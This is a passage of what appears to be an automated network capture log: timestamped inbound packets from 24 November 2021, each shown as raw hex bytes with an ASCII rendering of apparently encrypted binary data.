Data Ascii: :)0=Z$n\QZ[`O?jKfMVf@9T!8Mb4`%CMmmLI7BZI\|-~z}3-hX<7p\|a<Fh +Ss'F=4L<x.1^'o[YShDe-*#u\f'b]w8xFupU,hG"cW7j_''b3
2021-11-24 14:07:32 UTC	82	IN	Data Raw: 05 91 8e 34 86 a6 e4 79 a5 53 2b ff 94 4c 58 c1 b8 a5 2f ed 2d 70 11 9a ab a9 dc a3 51 f4 cf 51 68 a3 48 01 dc 06 0e ff 4c ca d1 13 0c f2 aa 61 e7 9b 58 d8 f4 d4 aa e0 a6 a9 ad 21 51 1c 5b 5b a4 71 07 68 0e 0b 5a af 34 b2 f0 3e 76 2d 0a d8 37 36 f3 75 bc e3 a2 e4 3b 5b a6 2b a6 16 eb 66 6a 3f 7c 38 71 5e 88 b0 d2 32 ce d8 6c 9f 16 03 92 04 b8 ac 17 38 c4 40 6a f5 ff 7a d1 94 f4 f3 a8 2a 77 8a a3 25 0b 92 67 e6 6c 2d 19 aa 09 3e e8 9c 17 3f 15 07 09 18 ad d7 4c f7 02 bd c5 50 84 7a f0 eb 63 c3 29 a9 38 81 f8 68 d8 96 15 8c d2 2d 96 67 59 f5 90 4a 9d c2 90 74 fd d8 40 d0 08 cc 78 71 8a 68 9c 0c 51 f1 e4 c6 54 73 fe fe 59 dd 6f b3 fd c9 ef f7 84 9e d3 2e b2 ac ac 5b b0 67 6e 5c 6b a6 5a a9 f4 79 04 9c 0d 23 99 d1 fd 80 dc 7e 21 7a d9 d7 64 0c 89 b1 0c 68 ee Data Ascii: 4yS+LX/-pQQhHLaX!Q[[qhZ4>v-76u;[+fj?\|8q^2l8@jz*w%gl->?LPzc)8h-gYJt@xqhQTsYo.[gn\kZy#~!zdh
2021-11-24 14:07:32 UTC	83	IN	Data Raw: 65 4a b7 cf 9a 34 5c 49 cd 70 9b 11 d0 47 78 ec af 2a 25 d2 69 e2 fd a6 b8 de 97 22 3c 68 8a 9d 78 50 64 c2 42 aa a6 4b df 94 8a 32 bc c0 fe b3 47 91 a8 f3 30 78 6a d7 e4 d0 07 4b 41 3e 43 94 fc 09 e8 a2 34 be b7 5c 3d 07 fc 9b c8 fa 4e b5 e8 18 ae 0c 36 f3 cf 41 8a dd bc e2 96 0f 35 e1 18 2f a6 38 4a 55 dc 78 65 dc 5a 5c 32 fd a6 70 0a 81 29 aa fc 8c b0 ae 87 aa 97 dd 69 2e 4e fc cb 3d 91 65 5f e7 58 03 15 9c 28 39 f6 90 f6 b9 9c 64 97 db b0 33 44 a2 e8 f9 25 7c 76 3d 18 c4 aa 84 f5 34 e1 32 90 a2 41 19 82 bf 8d 90 2c 1f 40 16 4e 45 fe 38 7e 96 bf 9e 6c 6d d9 7f 60 88 f8 e8 b7 4b a6 b1 36 ed db be ed e0 4c 83 11 f4 52 fb 0c 93 53 17 df e5 62 aa 6c b1 b5 c5 9e 29 d7 0f 99 7b c6 b7 1d 71 48 6c 5f d3 ff fd 58 61 48 b2 6f 11 80 33 36 c0 3b 10 4e 12 0b 64 24 Data Ascii: eJ4\IpGx*%i"<hxPdBK2G0xjKA>C4\=N6A5/8JUxeZ\2p)i.N=e_X(9d3D%\|v=42A,@NE8~lm`K6LRSbl){qHl_XaHo36;Nd$
2021-11-24 14:07:32 UTC	84	IN	Data Raw: 8b ee e6 1b 54 fd b5 4e cd 92 79 04 94 da 80 5f ed 7f 48 7a 2d 4b 7a 38 82 2e d4 57 e0 48 b2 2e a8 87 ae 2f 74 4b 4c 86 b3 55 aa d8 d4 49 95 21 f6 8f 90 c6 53 ec 03 00 0e 95 ba d0 78 95 e5 31 ae 58 d1 bd 4f a1 26 b0 30 2d bc 91 45 be 1f 00 27 c9 09 27 5e 46 17 7c 46 81 f6 2a 30 f6 00 8a ba 9f 0a e8 c2 6b 4f 4e 61 de 62 e3 3e 6f d8 81 49 7a f7 4a be a7 1b 8b 0d dd 8f 9e d4 e7 39 54 58 cb 70 da 13 b8 e0 b7 b2 c9 ba 48 d5 9c 65 88 92 55 7e 2b fa 8e f3 b2 99 3c 62 c2 1d a7 6b 0f ab f9 f5 c5 e0 53 68 20 bd 5b 7c 26 49 78 13 07 85 e9 77 a0 71 27 0d da 0e 0d 8d e4 b8 f7 c6 22 e9 47 50 6e 1b 16 93 b1 93 3e ba 68 23 3d a5 4d 21 0f e4 a9 0d ca e1 ca 73 e9 8a 21 3d 82 89 14 e6 bc b5 18 7a cb 47 b2 b1 4c 2f da b2 7d 9e 5c e5 3b a5 0c 40 15 f3 2b f2 f8 c2 11 ab 66 a2 Data Ascii: TNy_Hz-Kz8.WH./tKLUI!Sx1XO&0-E''^F\|F*0kONab>oIzJ9TXpHeU~+<bkSh [\|&Ixwq'"GPn>h#=M!s!=zGL/}\;@+f
2021-11-24 14:07:32 UTC	86	IN	Data Raw: f9 41 ca d9 0a d6 f0 ad 1f e2 64 77 4e 96 dd 2c 24 cd 5a da 59 c4 35 b9 55 4f 62 34 39 a0 5c 9e cc 48 a0 35 fb ae e2 c9 79 ac b8 14 c7 8e 8e a7 00 91 91 15 95 96 f1 cc 71 96 cd d7 ab 7d cc 88 c8 32 03 29 1f b0 64 20 8f d3 c0 6a 9a 06 23 ed 5f 5b 59 52 e5 53 2d 51 ec 22 5c da 72 90 d0 8d fe e1 35 5d aa 2a 71 89 77 08 6e 8f 1e 67 7f 8c 97 bc 57 48 22 91 3d 13 a0 75 1a 9b 47 d0 35 7f b6 80 2d ce 32 0a ca cc 50 a2 6e 15 4f 5f 53 a6 1f be ed ed 80 51 7b b2 0e 75 c0 e6 a4 60 a8 62 b6 b2 e7 a8 81 c0 e5 2f cd 32 98 6b d6 c8 ba 9a 87 7c ec f4 4d 91 63 03 e8 72 a9 07 0a 70 65 27 7f 97 e3 8d ad 00 1c 65 6d e2 7e 98 d7 01 6c 7f 75 c2 b9 1f 07 63 76 fa d3 4c 8f ba a4 a3 8d 14 f9 34 76 bf 06 93 78 29 de 8e 2b 52 23 f8 81 8f f3 1b 63 c4 e6 19 57 33 7b c5 61 cb a9 cb 46 Data Ascii: AdwN,$ZY5UOb49\H5yq}2)d j#_[YRS-Q"\r5]*qwngWH"=uG5-2PnO_SQ{u`b/2k\|Mcrpe'em~lucvL4vx)+R#cW3{aF
2021-11-24 14:07:32 UTC	87	IN	Data Raw: 1e e0 7c b6 6d 6c ab 03 db 94 a9 2f de b2 7d 44 f4 86 e4 73 fb bf 69 bc 76 9b 3e fe 90 05 ea 5b 45 ba 69 30 b2 60 54 dc f8 60 0d 12 19 3e 2c 28 67 47 3b 68 2b 1e 78 10 9d e4 38 3e 14 ae 07 9d 4a 1f 72 df 29 df 8f 5e 8f ee d0 a1 da f3 a1 32 6b 51 8c f7 bd c9 1e e8 89 7f 00 3a e3 6f 43 7f 1f bf 31 fb e4 a6 bd d0 00 aa 18 5d 87 82 6e eb 32 9c ca e5 11 7d c0 54 06 28 4b 07 62 97 90 41 d7 d0 a0 b8 ff 2c df c3 06 03 f2 5b 57 00 96 9d ac 7e a5 d4 ed 67 fd ff 8f 35 fc 39 0d 80 f5 23 1d 16 38 21 8e 44 23 3a da d9 b2 d3 1e ab 5b 35 57 d5 f1 28 8f 33 c6 97 d9 4d 05 0a b9 65 18 d4 4c e5 c7 dc 75 df ad 21 94 9a f9 ea a8 eb b9 9c ab dc db b0 e0 ea ba 01 07 78 5f 98 69 42 10 a8 ec 26 ab 9a fa 91 96 4f 01 a6 eb 0c 9d c5 e1 23 63 23 82 d1 ec 73 db 47 cf 18 e8 42 a1 77 69 Data Ascii: \|ml/}Dsiv>[Ei0`T`>,(gG;h+x8>Jr)^2kQ:oC1]n2}T(KbA,[W~g59#8!D#:[5W(3MeLu!x_iB&O#c#sGBwi
2021-11-24 14:07:32 UTC	88	IN	Data Raw: 14 7a 7b 23 de c0 bf 71 03 50 a3 e3 3e 0b d7 7f e8 26 26 d8 23 98 bb 68 9e a1 7e 02 47 2b 48 aa 70 91 4b 8e db af 1e c5 90 a3 b6 2e 82 da c6 f1 50 80 8c e3 15 ad 36 7c f1 8d aa ae 76 94 ad 65 b9 6d 6e 5c 16 e4 a6 a9 f4 f0 41 ef d9 ed 26 d2 8f 32 df 94 c2 7a a1 d7 f1 c2 2c dd 5c e5 a5 5c de d7 10 d2 b7 03 d9 f8 53 35 43 3d ca 95 21 7d 81 c2 2c d8 65 0b bb fe 62 0a 51 d7 03 04 ed d6 59 32 9b 78 ca 7e 28 44 4f 57 76 67 c8 42 d4 54 96 89 2e 8b 50 88 9d be c5 fc ef 3e 73 2b d1 bd aa 04 9c 88 db 71 2d eb 98 e1 1d 78 93 98 f0 95 cb e0 87 b8 fb e4 01 f7 67 18 3a 59 5f 2f 0a b6 41 8a bb 86 ce 0b 9b 02 fe c2 c3 df 5b 20 21 1b c0 dc d8 ee 68 22 2a 14 c4 db b8 af a0 44 87 d9 d8 f5 92 08 df 6c 21 ad e2 cb 2e c0 35 8d 35 16 af 56 72 77 2e 46 8f 3f 09 d8 b1 ad 9e 36 83 Data Ascii: z{#qP>&&#h~G+HpK.P6\|vemn\A&2z,\\S5C=!},ebQY2x~(DOWvgBT.P>s+q-xg:Y_/A[ !h"*Dl!.55Vrw.F?6
2021-11-24 14:07:32 UTC	90	IN	Data Raw: f1 58 ba cd 39 31 6f c5 34 43 c5 e9 bd 1a 0b eb a1 12 a5 46 53 03 35 d4 c1 99 6c 42 ad 29 05 ff 86 da 33 85 e1 1c 99 43 b8 c8 7a b1 a7 27 7f 56 14 a7 67 b8 2b e8 20 e3 74 b1 b7 dd 11 b1 84 ff d6 1d cd 4c b5 3a a3 e3 da dc 75 5d 95 3f a7 9e b7 82 da 87 97 a5 b4 d6 58 10 4e 12 0b 28 34 88 49 1a f4 86 14 15 1a 55 b4 3e d4 b2 04 15 ed 6d 0a 95 15 95 96 f1 12 60 c6 46 bd ea f4 60 9f 09 9e 77 3a cf 0e c5 a6 53 28 6c c2 a2 53 ca b8 a5 29 23 0c df b8 8d 65 54 73 9a 5f ae 35 a4 97 a3 ca 6a 3f 53 ee 26 41 2e e9 ac 5f 35 62 cc 07 ca b0 01 93 4d d8 e3 66 83 e8 26 ec e4 0c 5d af a9 f3 97 f1 32 0b ca a7 47 a2 6e 13 87 47 26 c8 44 ee 60 a0 ef 99 fe ef a7 5a 14 cf 94 e2 6c 6a 6e 31 af 1e d4 9e 1a d0 cd b8 06 0a 73 0c 7f 92 87 f7 b9 95 6a a1 22 0a a5 ae 11 15 35 71 33 51 Data Ascii: X91o4CFS5lB)3Cz'Vg+ tL:u]?XN(4IU>m`F`w:S(lS)#eTs_5j?S&A._5bMf&]2GnG&D`Zljn1sj"5q3Q
2021-11-24 14:07:32 UTC	91	IN	Data Raw: 21 93 f1 c0 58 8c 83 49 bd e2 a3 21 4d fb b1 82 0a a8 41 2d a2 3e 89 14 3d 0f 71 e6 b0 1b 1d ec 60 03 b3 68 48 9d ee 2c 93 ca 45 96 57 6b f4 5a a2 30 11 a9 0b ca 49 c6 73 e9 f6 e2 86 c3 45 98 65 80 eb 46 27 e3 82 f3 40 e3 c3 8c 39 08 01 28 68 bd 4c f7 e8 61 05 6e 99 74 01 5e f3 81 2e 10 68 7f 20 ae 2b df 66 1b 68 84 e2 8c 38 fe 23 ce d6 1e 33 7d 4e ad 87 f8 e3 d9 d2 fd 42 65 ae da c1 df 8a fe 9a 77 57 0e ce bb f5 e7 f0 d6 6b f0 af 9f 16 bb 28 53 a9 55 ea 36 ea b7 67 c2 30 08 39 b4 8e 9b 29 fc d2 bf 8e 72 02 87 01 ea 2b b9 03 99 55 d7 25 14 ef d0 0e 9d c7 0e c4 0d 87 02 a5 b8 b0 35 af 09 2d 8c 0a c2 55 ed 09 e3 09 28 20 14 8b d0 8e 7b db 67 a9 c7 6e 86 8f 1a 5d ae 1a bb a4 48 0b 26 ee b4 42 2f 64 fe 83 b4 35 67 31 21 61 5a fd 33 41 67 d2 dd 56 30 19 9f 48 Data Ascii: !XI!MA->=q`hH,EWkZ0IsEeF'@9(hLant^.h +fh8#3}NBewWk(SU6g09)r+U%5-U( {gn]H&B/d5g1!aZ3AgV0H
2021-11-24 14:07:32 UTC	92	IN	Data Raw: 2f a7 a0 66 04 31 b7 7f 25 f2 a9 1d 64 9f c7 82 dc 23 b2 f6 dd 14 c6 07 ed f2 12 28 06 83 ec ae 2a 8f 53 0e b6 0f df 77 3f 69 7c 1f fa 58 6f c0 61 6b c8 e0 84 cd 62 f6 05 57 fc b7 b1 ee b1 bc 0f dc ed 43 5b f0 47 d7 43 e8 e3 a6 42 99 5e d2 26 1d 60 d1 f3 98 70 ca 78 c2 61 03 43 cb 46 f3 c1 fb b5 ec eb 17 43 ea ff e8 a5 01 be 3d c2 7d ed a2 68 60 e6 eb f9 0f c8 03 26 0b 80 20 99 a9 6c e5 53 af ae aa c3 f0 29 55 ff cf cb da 2d f3 ca 24 ac 8f 76 30 d1 33 dc 83 e3 d7 00 f8 16 06 73 7d a3 38 0c 15 47 d8 62 5b 5f 04 81 aa 28 12 6c b6 e9 1f d9 17 ba fe 0f 28 d6 e7 f3 45 45 fc 71 b1 94 ac dd f1 bd 65 84 08 be bb 68 48 21 d1 e5 fd 4d ba 0a a5 a9 2c fe bb 20 23 91 d7 d6 49 f1 17 3d db 4b 36 c4 82 3c 68 8b bb 5e f4 88 77 8b 3e 3c 72 f3 ff a7 f6 d6 8b a6 e5 e1 e4 fd Data Ascii: /f1%d#(*Sw?i\|XoakbWC[GCB^&`pxaCFC=}h`& lS)U-$v03s}8Gb[_(l(EEqehH!M, #I=K6<h^w><r
2021-11-24 14:07:32 UTC	93	IN	Data Raw: 4a 16 4d be c1 1a 7c 0d c2 05 dc 90 91 f6 f2 be 43 a4 fd 6b 83 50 bd 25 e5 39 d3 de 26 91 52 7f c8 10 be d4 6a c0 4c 0f 71 a0 1b 3c 0e d1 ea 1e 47 d0 56 ff 7f 7f 4a ff 16 8d d5 1d 2e 1b 4d ec 23 b2 56 4c f2 91 8c 47 1a 76 85 be 9d 9a 67 40 16 4e 45 c6 b5 b4 c7 17 27 c8 52 ad d5 f3 c7 a9 95 7a 2e 29 9d 4a bc 46 99 e1 ae 48 60 f6 19 8c 91 8e 82 be 17 8e eb f1 a2 61 07 d7 a1 84 8b 97 f2 9f d5 78 12 a1 9e 2d e7 c6 4e 98 5b 50 09 8b 1f 3f 29 c6 63 d1 55 1f 62 fe f1 08 4b 76 73 e1 b7 27 c9 45 94 0c 8d 23 43 e0 b2 f2 cd 72 65 59 a2 29 21 61 e6 2d 24 00 4e 42 23 6d 5d 55 f4 3e 12 29 b1 61 2d b1 da 6e 0b 16 b4 68 cb cd b9 2f e8 d9 49 8c fa 7b 1b 49 5c b0 72 9a d6 3f bf 70 e9 82 bd 11 52 9f e6 97 0b 4a ca a4 52 3b ca c5 1d f0 92 a2 8b e8 27 1d d9 31 1c 31 d0 72 f8 Data Ascii: JM\|CkP%9&RjLq<GVJ.M#VLGvg@NE'Rz.)JFH`ax-N[P?)cUbKvs'E#CreY)!a-$NB#m]U>)a-nh/I{I\r?pRJR;'11r
2021-11-24 14:07:32 UTC	95	IN	Data Raw: 04 5a 17 10 d3 ca ca 14 93 56 b3 91 37 16 2c 30 b4 4d e7 69 fa 3c ff bf 16 d6 98 92 3f 53 26 24 71 73 b9 b5 22 b0 dd 81 ff 03 e9 88 24 64 d9 1f c0 87 53 e0 2c 62 8b 4e 82 02 6a 69 bd de 01 e5 ac 7e 7e 8b 88 ad 76 ff 72 b0 b6 03 b8 23 7a 40 95 d2 d5 e7 79 66 d1 7e 14 9b 1d 3d 7b 4e da e8 9b fd 6c 57 40 c0 16 65 e5 27 cc a9 36 f1 36 48 dc fb e7 0a 0f b4 07 71 d7 86 83 4e e5 7f 78 86 f6 0a c1 33 96 a8 48 05 a8 91 3f ff e2 e3 d8 c4 3f 25 a3 16 e0 d5 66 32 4a 1d e0 e1 f3 f5 c8 0c 17 6c b5 91 1b 57 36 5e 9f e0 28 29 da a7 9b 96 0a a5 79 8d 83 63 ec 37 b4 0e 2e cb 5b ad df 49 73 30 e3 c5 90 26 c2 3a f0 a2 2b 82 0d 64 7b 48 93 35 4e bf 36 25 d0 8b 4e 44 f4 43 5d de 30 15 45 d9 73 08 d9 f9 1f 35 19 1c 37 9a 6b 01 29 90 31 96 bd a7 29 1f c0 1e 64 a8 78 65 33 52 b7 Data Ascii: ZV7,0Mi<?S&$qs"$dS,bNji~~vr#z@yf~={NlW@e'66HqNx3H??%f2JlW6^()yc7.[Is0&:+d{H5N6%NDC]0Es57k)1)dxe3R
2021-11-24 14:07:32 UTC	96	IN	Data Raw: d2 ec 23 90 c8 c7 b9 c3 5a 1c d4 aa 20 30 35 fd ca 05 95 08 9f 15 14 23 cd 0c 3a fe 6a a0 52 ad ef 2e 3b d8 08 74 9f b3 20 57 34 8e 7a e2 98 12 f0 76 8b 99 ee 0a 1a 55 1c 9e 7c a3 21 5b f1 e4 3a 18 d4 53 6d 56 b3 c1 db ba 9d db c3 d8 f9 f3 23 73 71 73 75 82 fd cb 3a 69 05 46 ed 8d c0 8d 0f ba 24 c4 86 70 5d 17 b9 47 bc 2c a8 d9 59 59 8c 25 2e d4 d3 9d df 1f d7 ce ce 24 25 19 5d 93 37 8a 9b c8 fc 15 63 04 61 5d 6d 22 dc 5b 8e d7 b8 16 7a 91 69 82 7d 20 72 4c 97 c1 92 81 38 f5 a5 46 a8 d9 00 3f 76 fa bf d8 24 7e 34 df eb 69 a8 3e e3 ab a3 56 88 69 34 b5 67 8d 57 82 75 90 9c 00 ea b5 a4 6a 3e 45 ba bc 2d e2 f4 7d 14 ee aa 4b 1e d5 70 b4 2e a8 6f b5 83 e9 fe 7c 58 fa 14 6e 29 98 f7 ea 0c f3 32 68 2a 8b 71 5d 48 53 d1 42 fd 56 41 1a 98 c7 51 d3 59 3c 6c c5 5f Data Ascii: #Z 05#:jR.;t W4zvU\|![:SmV#sqsu:iF$p]G,YY%.$%]7ca]m"[zi} rL8F?v$~4i>Vi4gWuj>E-}Kp.o\|Xn)2h*q]HSBVAQY<l_
2021-11-24 14:07:32 UTC	97	IN	Data Raw: 36 07 7d 0e ae 6a c6 08 1c a2 03 87 82 ed 74 b1 22 c8 15 4e 56 9f 76 f1 11 50 e9 5a b4 31 38 ca 85 2b d7 b0 71 4c be fd 7d a4 95 22 5d ee 02 1f 23 2c c2 3a f7 28 8a fa 0a 25 26 82 f0 e4 df 1e 12 bc 6b 3f 67 77 d3 19 1e ba e6 fb f7 98 be 74 26 05 b9 de 0e 53 c8 7c c5 9e 15 85 d1 99 2e 42 55 68 8a 6a c8 4c 5c 11 86 ce 7b f3 eb b8 9c ea 7e 24 4f e0 ea ae df 3a 41 ea c3 29 bb 91 ef f6 64 a3 88 a1 6f cd c0 1a f9 98 f7 c6 cd 62 22 95 e2 bb c2 b5 74 95 55 ce 93 ed 01 c2 b0 54 bd 1c bf c2 a6 66 a6 c8 39 da 34 58 4d 08 44 00 5b f5 27 d4 59 98 8b 74 a7 be 62 bc 06 ef 2c 74 14 b5 4f 50 bb fe 57 01 4b 6a 24 09 01 1c 58 33 1b 69 23 2c ac 63 38 91 43 6a 71 98 95 f5 ec 1b 7c 5a a5 0d 01 4e a2 ca f7 3d d4 31 43 dd 7c f3 24 7d c8 fd 44 5b 55 25 6a 1f 43 46 48 16 05 1c 48 Data Ascii: 6}jt"NVvPZ18+qL}"]#,:(%&k?gwt&S\|.BUhjL\{~$O:A)dob"tUTf94XMD['Ytb,tOPWKj$X3i#,c8Cjq\|ZN=1C\|$}D[U%jCFHH
2021-11-24 14:07:32 UTC	98	IN	Data Raw: ca f5 e1 63 11 b5 8c 22 6b 27 ad df 62 57 22 53 27 ce 32 1d 0f 83 b7 a8 da 19 61 f9 e8 73 c0 e0 a9 e0 82 c1 05 ba 1f 53 3f 95 6e cf ad 60 0c 32 14 ce 91 9c 2e 78 5a 14 ea 29 a4 a0 9a ec 24 de f5 b9 cd 2f b7 b7 2d e7 fc 17 87 1d f7 5b f5 32 31 da c1 40 b0 2f 04 73 7e fe e2 2b 56 b1 01 a2 8f cc 4b 79 53 46 8e f3 7e 2c bb 52 f2 4e b1 88 3a 2f 86 5f 0b 0e fa 0e 4c d2 11 56 23 e5 1b a6 ce de d6 99 c3 87 4a 5c 06 0c af 94 fe d0 56 a9 85 8f f7 01 90 ed 47 ac a1 40 63 3d 9f 62 9c c6 9e 90 6e b3 83 7a 0d 96 aa 80 83 48 2f b8 7c dc 3f 47 84 5d 04 3b bb 4c 0b 3a f9 a6 ea 8e 9e 68 ed 57 df e2 cf 5b ee 4e ab 90 b8 12 9c ee 4c 48 eb 0c 6d 0a 59 76 e5 a1 87 5e c7 f3 5f 2b 4a a5 16 98 34 a9 97 92 8e 00 84 48 47 94 69 1c 3c 41 e8 ee 66 f6 34 fe 1f a7 1d d6 67 56 99 32 45 Data Ascii: c"k'bW"S'2asS?n`2.xZ)$/-[21@/s~+VKySF~,RN:/_LV#J\VG@c=bnzH/\|?G];L:hW[NLHmYv^_+J4HGi<Af4gV2E
2021-11-24 14:07:32 UTC	99	IN	Data Raw: ca be dd 2a 86 9c 9a f2 ab 75 38 19 63 df 10 fe 60 a4 d2 ca 52 3d e6 04 e4 38 50 b8 05 47 3c 3c e0 91 43 30 68 fc 3d a1 cd 3b 90 1c 7a 6b a4 54 01 b3 55 fd 93 10 a6 ae 9e da ca 8e ee 40 b9 da 61 a0 b2 b0 eb 94 63 a9 8c bc 86 93 62 15 29 ca 6f 5e c6 1a c6 36 a2 51 cc 18 5d 5b 96 89 cd fe c2 d4 af 9f 0e dd 94 ba 6d a2 df 3d 64 cd b2 91 88 a8 c0 fb b7 48 13 df bb e0 66 e6 b6 65 7f b1 ed 85 86 2e 1c c0 16 a2 41 29 28 30 8a 93 6b 3a b9 30 3c 87 7a c3 1b 45 d0 2f 3b 2b 00 28 b1 f5 9d 01 64 59 8d d6 e9 a6 c6 31 5f 89 9c ca 04 51 ff 0a 21 f5 d5 a9 e0 fe fe 4e 30 49 2c d5 c6 4b 04 8a 07 29 6c d0 38 1b 01 02 d7 38 08 9a ae 7c 85 a1 88 95 7f 23 27 c2 f4 61 78 b7 52 62 b4 a7 6d 68 68 5f 82 ad ef e9 ad dd d4 86 2f c9 70 65 d8 0f a5 7f d6 ee 6e 23 84 bc f6 d0 57 39 11 Data Ascii: *u8c`R=8PG<<C0h=;zkTU@acb)o^6Q][m=dHfe.A)(0k:0<zE/;+(dY1_Q!N0I,K)l88\|#'axRbmhh_/pen#W9
2021-11-24 14:07:32 UTC	100	IN	Data Raw: e2 be 93 0f 9a 3a 41 71 ef f4 87 12 6c 63 21 c4 ed 9c 8f d8 57 aa a8 63 35 57 12 3c 96 4a 92 f4 14 f5 75 f6 23 ce 0c 80 6d 9c 83 2c a0 fb 42 f4 32 54 aa c3 e1 6b 46 ee 2b 60 96 31 bf d3 ca 82 62 96 5c 35 e9 57 7f b1 35 ee d8 72 5e dc d9 aa 0c 14 97 f0 1b 6b 2c cd ad 31 95 fd b2 0e 13 e2 ab 5a f8 c4 c3 7a 93 11 87 60 ce 88 a8 39 00 1a a8 15 c9 82 38 33 a3 18 b2 9a 6f 68 62 fb 6d b2 84 44 95 29 49 5e 7e e3 8b 73 d7 c2 cc 9d 74 27 a2 ce ee 9a a7 e6 2d 72 c3 94 11 5e 0b a0 34 1b 6e 44 fb ca a8 8c b7 e2 1a 9f cb 81 3c 34 ab e1 cf 3d ba ed 3f 15 09 be 9c 4a eb 26 02 d1 8c 25 3e 8c 3c a9 7f e1 f3 40 94 d3 42 2c 09 77 28 81 b5 22 40 c6 29 f2 2f 0f 34 3a 94 8e 35 d9 5f 19 40 26 b5 8f d4 20 23 42 64 48 f4 1f 6b ec f8 b9 92 b4 06 bc db b6 c6 cd 20 e7 78 f0 c3 0f 93 Data Ascii: :Aqlc!Wc5W<Ju#m,B2TkF+`1b\5W5r^k,1Zz`983ohbmD)I^~st'-r^4nD<4=?J&%><@B,w("@)/4:5_@& #BdHk x
2021-11-24 14:07:32 UTC	102	IN	Data Raw: 9e 94 1e f4 4c fd 9d e1 7a e7 56 a5 ef 3c 1f 18 3b ad 73 e9 09 6e 83 a7 5d 1b 63 d3 e2 df 3e 18 1e 3e 15 68 2f 32 bc 4d ea 5c e5 38 a9 ef bf ea f5 eb ea 87 fd ec a9 66 a3 78 fe 97 32 c7 7a 37 ad 58 eb 40 84 72 54 e3 f0 06 ed 4c c2 c4 1c a5 fb 2f 99 ad c1 f5 20 cd 89 1a 48 19 b2 4f 52 0a 25 b7 39 12 f2 56 67 98 80 7b da 87 cf 55 95 5e b9 de 94 a4 c7 f7 6f c0 38 cb 3e 7c 06 c9 ea ae 82 57 12 f2 f2 c4 82 ed a4 ac 67 81 d6 d1 49 4b 3c 16 43 91 89 b6 fa bf ac 89 d0 f0 d3 0c 65 5c 3d 6d 76 bc 9d 24 95 1a 7e d8 dc 08 d1 52 09 04 75 70 be 29 ce 92 70 1d 53 ff ee c4 5d b5 06 f5 e9 69 78 ed 58 fb a7 70 12 51 29 aa 1d d0 d2 65 47 8f 3e ac e5 cd 4a 42 b7 10 41 65 2b 94 55 67 1d 19 d7 ce 7f c6 36 6f 8c bb 7f 24 e0 ee ba 9b e5 f8 72 2a cc 02 a1 fb aa 07 b2 ec 60 f1 62 Data Ascii: LzV<;sn]c>>h/2M\8fx2z7X@rTL/ HOR%9Vg{U^o8>\|WgIK<Ce\=mv$~Rup)pS]ixXpQ)eG>JBAe+Ug6o$r*`b
2021-11-24 14:07:32 UTC	103	IN	Data Raw: c3 ea f8 3a de ec 55 5b d5 9b a1 91 37 94 41 2d f1 69 42 32 b4 26 cc 7d 00 91 a2 07 99 c9 13 93 2d 67 0e f8 e5 57 53 cc fd 25 d8 15 a3 d6 e7 7c 36 f4 2a 92 0a c6 2f 98 cb 59 ce 2a fc 65 b0 e6 be 4e f0 5f e4 e4 e3 fe 75 9a 80 dc b2 98 6b b8 00 7b 62 41 45 11 a8 ad dd eb e0 2b 54 fc 6e 2b 71 03 86 fb 46 f6 fe e6 2d 70 9e ad 7a bb 28 3e 52 ee 70 23 42 0c 0d e0 e9 8b 23 78 ae 8f d5 33 d5 c6 ff b4 2b b6 c7 c9 49 3e 3c 3d ff 9e cd 4d ba 9b f6 0a de e7 8f d0 bd 84 12 ef 1f 1a 0d 67 c8 7f 59 0d 9f 4b e0 a8 fa 6c ef 4a 08 ae 0a ae 99 fd b1 a6 17 b0 b4 94 6d 04 86 65 1a af 70 d9 ce 35 98 d8 6e e6 1e bd cc 6c 86 92 33 57 61 f1 2a 19 a2 31 e2 86 4a cf af 34 dc bf b6 c2 b1 3a 14 d8 25 49 29 ce 8d 0c 24 c0 dc 53 43 55 22 10 08 8a 01 45 f3 0b d3 4f ac 21 02 6d f7 34 05 Data Ascii: :U[7A-iB2&}-gWS%\|6/YeN_uk{bAE+Tn+qF-pz(>Rp#B#x3+I><=MgYKlJmep5nl3Wa*1J4:%I)$SCU"EO!m4
2021-11-24 14:07:32 UTC	104	IN	Data Raw: e3 8a a7 6f 4c bb fa bb 9e 6f c4 3e 67 b1 63 2e a2 f6 eb f1 94 5e eb 0f c4 aa 73 38 77 3f 79 22 ce 47 a9 2f 2e b1 c2 ae 43 19 16 24 c6 50 30 ac 80 74 0f cd 36 b7 77 b3 56 36 f0 bf ea a2 68 2b b4 be c0 92 b0 26 0a 15 e8 7b b3 e4 82 5f 52 27 e5 62 b2 b8 0a b3 8d b7 21 9f da 0a b0 22 3f 22 e0 4e b1 e4 3a a3 1d 58 61 c5 04 4a 85 53 9c d1 55 1f 29 34 09 a7 5c 9e 9c f6 e2 97 0d 51 9e 8e b1 c8 92 d4 b2 87 39 81 6c 51 ca 1d b0 c9 62 ca a9 8e b0 ef 51 7b a9 c8 cd 34 03 5d 13 ea 6a 61 5f 40 63 96 ca 50 46 0b e1 a0 a6 d1 c9 35 12 0f 54 a0 9c d8 22 9d b3 c5 72 dd fe d2 97 e2 c7 08 af 38 3a 0b f2 27 c4 94 90 b0 01 f8 14 a8 b3 31 40 b8 f8 a4 e3 d6 85 ba 27 e5 62 1d 9e a5 4a ce 2a a2 6e 13 87 7f 26 c8 44 ee 60 a0 93 45 83 7e 7b 5a 14 2a c5 7b 3e 82 33 d7 d4 dc 62 74 68 Data Ascii: oLo>gc.^s8w?y"G/.C$P0t6wV6h+&{_R'b!"?"N:XaJSU)4\Q9lQbQ{4]ja_@cPF5T"r8:'1@'bJn&D`E~{Z{>3bth
2021-11-24 14:07:32 UTC	106	IN	Data Raw: 34 45 18 5b 30 9a 95 65 d9 9a 00 d3 5c 0a 70 a1 d4 9b f4 d2 b1 da 58 f7 e2 a4 5d d1 92 08 64 ed a1 85 ef 2a 2b 43 0c 7d ce 09 96 44 07 0e 88 43 1f 68 84 9d 6d fd 94 8b 63 46 9e 7d 66 75 39 1e bb ae a2 02 97 8c e1 7a 5f 55 a5 ef aa b3 1c 59 af 73 62 4c fd 8e 89 05 12 63 82 de 19 10 20 24 3c 7f 68 45 da d8 2d 45 f2 e3 eb c1 ad 36 bf b8 b9 57 bf 02 13 fb eb c7 64 23 97 32 4c f3 5c 5d 2c 6e 9b e1 f7 a8 a1 7d 93 7f b1 57 3b c3 a6 d3 9e dc 52 54 7e 23 ea ed 26 07 9a 26 fa 92 7b 8c 18 90 05 db c1 f3 a1 c4 bf fe 0e d8 b1 26 de cc cf c4 74 8f 2b 74 c0 bb 8c fe f9 d9 ae 73 25 67 0a 81 91 57 8f d0 05 ba 0a c7 95 55 15 27 1b 3a 1e e3 90 89 bf 80 87 53 76 81 48 ba 0b 24 5c be c3 73 86 53 ec 14 6f 17 67 dc a6 78 